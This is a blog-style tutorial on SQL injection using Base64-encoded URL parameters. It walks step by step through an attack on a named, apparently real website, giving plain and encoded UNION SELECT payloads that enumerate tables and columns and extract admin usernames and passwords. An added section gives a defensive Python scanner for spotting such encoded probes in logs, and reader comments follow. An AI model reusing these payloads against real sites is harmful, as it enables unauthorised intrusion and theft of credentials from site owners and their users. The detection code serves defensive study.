SQL Injection using Base64 Encoded Queries
Hello! I hope you are fine. Today I am going to teach you how a website can be injected using Base64-encoded queries, so let's start.
I already have a website vulnerable to Base64 injection:
http://aimschennai.in/viewpost.php?id=6
How do we know whether this website uses Base64 or not? When we try to find the column count using a plain order by and get an error, it means the website may be using Base64, like this:
- As you can see, when I used the order by statement I got SQLi errors.
- Now select the vulnerable id and the order by statement.
6 order by 1 (Encoding) No error
Click Base64 Encode and Execute
When we encode this, you can see that we don't get any error.
Now use this method to find the number of columns:
6 order by 2 (Encoding) No error
6 order by 3 (Encoding) No error
6 order by 4 (Encoding) No error
- 6 order by 10 (Encoding) Error (see screenshot)
- We got 8 columns, so now use a union select statement and encode it.
Click Base64 Encode, then execute.
You can see that we got the table number. Now simply use the table query and encode it.
Example of Encoding
Simple Query: http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_Schema=database()--+-
Encoded:
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDQsNSw2LDcsOCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfU2NoZW1hPWRhdGFiYXNlKCktLSAt
We got the table data. Copy aims_user and find its columns with a simple SQLi query.
Decode Queries or find table data
Simple :
http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=CHAR(97, 105, 109, 115, 95, 117, 115, 101, 114)-- -
Encode :
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSw0LDUsNiw3LDggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPUNIQVIoOTcsIDEwNSwgMTA5LCAxMTUsIDk1LCAxMTcsIDExNSwgMTAxLCAxMTQpLS0gLQ==
We got all the columns. Now we need the admin username and password; use a simple SQLi query and encode it.
Simple :
http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(am_username,0x3a,am_password),4,5,6,7,8 from aims_user
Encode :
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGFtX3VzZXJuYW1lLDB4M2EsYW1fcGFzc3dvcmQpLDQsNSw2LDcsOCBmcm9tIGFpbXNfdXNlcg==
Finally, we got the admin users and passwords.
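A defender's view of the technique above, as an added example that is not part of the original post: a Python log scanner that Base64-decodes each query parameter before matching the order by / union select shapes used in this article, since a filter that only inspects the raw value never sees them. The log format, the 203.0.113.7 address and the pattern list are assumptions, and the sample lines are constructed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Patterns limited to the query shapes shown in the article (assumed rule set).
SQLI_RE = re.compile(
    r"\border\s+by\s+\d+|\bunion\s+(?:all\s+)?select\b"
    r"|information_schema|group_concat\s*\(", re.IGNORECASE)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{2,}={0,2}$")
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def try_b64(value):
    """Return the decoded text if value is Base64 of printable UTF-8, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns '+' into a space
    if not B64_RE.match(value):
        return None
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def scan(log_lines):
    """Return (path, param, encoding, text) per hit; raw value is checked before its decoded form."""
    findings = []
    for line in log_lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            for encoding, text in (("plain", value), ("base64", try_b64(value))):
                if text and SQLI_RE.search(text):
                    findings.append((url.path, name, encoding, text))
                    break
    return findings

def _log(target):
    """Build a constructed access-log line (sample data, not real traffic)."""
    return f'203.0.113.7 - - [01/Jan/2024:00:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE = [_log("/viewpost.php?id=" + v) for v in (
    "6", base64.b64encode(b"6").decode(),
    base64.b64encode(b"6 order by 10").decode(), "6%20order%20by%2010")]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The two benign requests (plain `6` and its Base64 form) produce no finding; the encoded and the plain `order by` probes are both reported, each tagged with the encoding it arrived in.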
2 comments
Can I know what extension you are using?
The article seems interesting, however, having most of the content in blurry images makes it completely unusable for me. Why would you do that??? Not good, not good.